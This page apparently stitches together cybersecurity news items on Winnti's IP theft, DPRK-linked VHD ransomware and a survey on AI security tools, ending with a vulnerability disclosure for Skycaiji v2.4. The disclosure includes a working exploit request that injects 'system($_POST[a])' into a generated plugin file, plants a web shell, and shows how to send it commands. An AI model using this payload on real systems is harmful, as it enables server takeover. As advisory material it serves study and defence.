**Stolen Data Costly and Dangerous**

Winnti primarily went after American, European, and Asian technology companies and manufacturers. They went for intellectual property “including sensitive documents, blueprints, diagrams, formulas, and manufacturing-related proprietary data,” according to the report.

It’s clear that the haul was massive, and it’s partly for that reason that the researchers couldn’t determine the exact number of organizations affected, and the precise financial impact incurred by them.

The other reason why they couldn’t gauge the combined cost is that many costs may be yet to come. Beyond commercial IP, “the attackers collected information that could be used for future cyberattacks, such as details about the target company’s business units, network architecture, user accounts and credentials, employee emails and customer data.”

To avoid further Winnti attacks in years to come, targeted organizations will need to update all those employee credentials, adjust that architecture, and root out any potential backdoors. If even one hole is left over, they’ll remain vulnerable.

****Aging APT Still Packs a Punch****

Winnti is one of the oldest APTs still in business, with malicious campaigns dating back a dozen years already.

In their early years they primarily targeted gaming companies in Southeast Asia, stealing in-game currencies and then flipping them for real life profits.

Notorious for their “stealth, sophistication, and focus on stealing technology secrets,” the APT has been known to compromise digital certificates – the electronic documents meant to ensure authenticity between connected devices  – and deploy bootkits – which nuzzle into the innermost parts of a computer’s motherboard: the master boot record – to poison supply chains and even target specific individuals.

These were already advanced tactics, but their newest campaign is the groups most sophisticated to date.

China-linked APT Caught Pilfering Treasure Trove of IP

Researchers use code, Bitcoin transactions to link ransomware attacks on banks to DPRK-sponsored actors.

A new ransomware strain called VHD has been traced to North Korean state actor APT38 by a team of researchers using detailed code analysis and following a Bitcoin trail. 

The Democratic People's Republic of Korea (DPRK) has used ransomware for several years to raise money for state coffers, including the February 2016 Bangladesh bank heist in which attackers tried to use the SWIFT banking system to steal almost US$1 billion, explains Trellix researcher Christiaan Beek in a new blog post. 

Beek and a team of fellow cybersecurity analysts linked North Korea's cyber army to the VHD ransomware, which they said has been used in ransomware attacks on global financial systems and cryptocurrency exchanges since March 2020. The analysts compared known DPRK code with VHD ransomware and found stark similarities, the post states. Bitcoin transactions overlapping between known DPRK-sponsored cybercrime groups were also reported by the team. 

"We suspect the ransomware families described in this blog are part of more organized attacks," Beek adds. "Based on our research, combined intelligence, and observations of the smaller targeted ransomware attacks, Trellix attributes them to DPRK affiliated hackers with high confidence."  

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

New Ransomware Variant Linked to North Korean Cyber Army

Companies see AI-powered cybersecurity tools and systems as the future, but at present nearly 90% of them say they face significant hurdles in making use of them.

Companies are quickly adopting cybersecurity products and systems that incorporate artificial intelligence (AI) and machine learning, but the technology comes with significant challenges, and it can't replace human analysts, experts say.

In a Wakefield Research survey published this week, for example, almost half of IT security professionals (46%) said their AI-based systems create too many false positives to handle, 44% complained that critical events are not properly flagged, and 41% do not know what to do with AI outputs. In total, 89% of companies reported challenges with cybersecurity solutions that claimed to have AI capabilities.  

    

Source: Devo

Not all AI-based projects are created equal, as some technology is more mature, says Gunter Ollmann, chief security officer at Devo, which sponsored the survey.

"When they talk about rolling out AI for cybersecurity ... those are the projects that are commonly failing," he says. "In particular, NLP \[natural language processing\] is being dangled as a technology that can do cool things for your security and as a way to manage your attack surface area, but it has not really been successful."

**The Promised Benefits of AI for Cybersecurity  
**Incorporating machine-learning and AI features into cybersecurity products has been widely heralded as a way for companies to gain more visibility into attacks on their data and infrastructure, and as a way to respond more quickly. In December, for example, business consultancy Deloitte called the trend toward more AI in cybersecurity to be a way of taming the complexities in today's business infrastructure, which includes more devices, more cloud services, and more employees working from home.

"Cyber AI can be a force multiplier that enables organizations not only to respond faster than attackers can move, but also to anticipate these moves and react to them in advance," the consultancy stated.  

The most mature uses of machine learning in cybersecurity products are for the detection of threats on the endpoint and user and entity behavior analytics (UEBA) to pinpoint risky users and compromised devices, says Allie Mellen, security and risk analyst for Forrester Research, a business intelligence firm.

**AI Security Challenges Abound**  
While finding and classifying IT assets topped the list of uses of AI-based cybersecurity — with 79% of companies using the technology for that application — it also topped the list of challenges, with 53% of respondents considering the use case problematic, according to Wakefield Research's survey of 200 IT security professionals.

About a third of companies had challenges in correctly deploying the systems, and a quarter criticized the vendors for not updating the product enough to be valuable.

There are definitely differences in opinions between business executives, who largely consider AI to be a perfect solution, and security analysts on the ground, who have to deal with the day-to-day reality, says Devo's Ollmann.

"In the trenches, the AI part is not fulfilling the expectations and the hopes of better triaging, and in the meantime, the AI that is being used to detect threats is working almost too well," he says. "We see the net volume of alerts and incidents that are making it into the SOC analysts hands is continuing to increase, while the capacity to investigate and close those cases has remained static."

The continuing challenges that come with AI features mean that companies still do not trust the technology. A majority of companies (57%) are relying on AI features more or much more than they should, compared with only 14% who do not use AI enough, according to respondents to the survey.

In addition, few security teams have turned on automated response, partly because of this lack of trust, but also because automated response requires a tighter integration between products that just is not there yet, says Ollman.

**Augmentation, Not Replacement  
**Another dimension of the AI challenge is a lack of clarity on its role vis a vis security staff. While AI applications can deliver real benefits, it's important to understand that they augment the human analyst in the security operations center (SOC) rather than replace them, Forrester's Mellen stresses. That's a conclusion many companies likely do not want to hear, given the problems many have in hiring knowledgeable cybersecurity professionals.

"The most important resource that we have are the people that we have working today in the SOC," Mellen says. "AI helps, of course, for detection ... but we have to recognize that it is not going to be a complete game changer for security. The way that we use machine learning today is not even at the point where it would be able to take over most of the responsibilities of the human analyst."

Devo's Ollman also cautioned that organizations need to have realistic expectations for what AI can and cannot do.  

"I think there is the sci-fi view that AI will be a superhuman that operates at 1,000 times faster than the best human alive; leave that for the sci-fi books," he says. "Augmentation is about how do I make the human faster and more efficient in what they are doing, and also closing skills gaps that they have."

The challenges all suggest that trained human analysts, with expertise in machine learning and AI, are needed to make best use of AI-augmented cybersecurity products. And AI systems that can explain their conclusions will be necessary in the future to augment human analysts and retain trust, Ollmann says.

AI for Cybersecurity Shimmers With Promise, but Challenges Abound

Skycaiji v2.4 was discovered to contain a remote code execution (RCE) vulnerability via /SkycaijiApp/admin/controller/Develop.php.

**Vulnerability conditions**

*   Website Admin permissions

**Vulnerability details**

Location: /SkycaijiApp/admin/controller/Develop.php#L707#funcAction()

Code:

    ...
    else{
    				
    				$module=input('module');
    				$copyright=input('copyright');
    				$identifier=input('identifier');
    				$name=input('name');
    				$methods=input('methods/a',array());
    				
    				if(empty($module)){
    					$this->error('请选择类型');
    				}
    				
    				$module=$mfuncApp->format_module($module);
    				$copyright=$mfuncApp->format_copyright($copyright);
    				$identifier=$mfuncApp->format_identifier($identifier);
    				
    				if(!$mfuncApp->right_module($module)){
    					$this->error('类型错误');
    				}
    				if(!$mfuncApp->right_identifier($identifier)){
    					$this->error('功能标识只能由字母或数字组成，且首个字符必须是字母！');
    				}
    				if(!$mfuncApp->right_copyright($copyright)){
    					$this->error('作者版权只能由字母或数字组成，且首个字符必须是字母！');
    				}
    				
    				$newMethods=array();
    				foreach ($methods['method'] as $k=>$v){
    					if(preg_match('/^[a-z\_]\w*/',$v)){
    						
    						foreach ($methods as $mk=>$mv){
    							
    							$newMethods[$mk][$k]=$mv[$k];
    						}
    					}
    				}
    				$methods=$newMethods;
    				unset($newMethods);
    				
    				if(empty($methods['method'])){
    					$this->error('请添加方法！');
    				}
    				
    				$app=$mfuncApp->app_name($copyright,$identifier);
    				
    				$id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));
    				
    				if($id>0){
    					$this->success('创建成功','Develop/func?app='.$app);
    				}else{
    					$this->error('创建失败');
    				}
    			}
    		}
    ....
    

Vulnerability key code:

    $app=$mfuncApp->app_name($copyright,$identifier);
    $id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));`
    

�  
follow up $mfuncApp->app\_name  
  
Concatenate $copyright, $identifier directly, then return.  
Go back to $id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));

follow up $mfuncApp->createApp

$module,$app,array('name'=>$name,'methods'=>$methods)

And the parameters we can control,follow up  
$funcFile=$this->filename($module,$app);  

Return directly after splicing

Continue back to the createApp function  

There is no filter /\* and \*/ for variables $name  
/plugin/func/$module/$copyright$identifier.php

Exp is constructed directly here:

    POST /index.php?s=/Admin/Develop/func HTTP/1.1
    Host: 172.16.49.3:50004
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 179
    Origin: http://172.16.49.3:50004
    Connection: close
    Referer: http://172.16.49.3:50004/index.php?s=/admin/Develop/func
    Cookie: PHPSESSID=o7c4tlckirjijmciq20ivi0cv4; login_history=3%7C6a03060e5e6600124dab098dfed314df
    
    _usertoken_=94701bbd27956c7d922c079da883c68f&module=downloadImg&name=*/system($_POST[a]);/*&identifier=a11&copyright=b1&methods%5Bmethod%5D%5B%5D=a12&methods%5Bcomment%5D%5B%5D=11
    

  
check the file  

Visit /plugin/func/downloadImg/A11B1.php  
post: a=command

Tag

#intel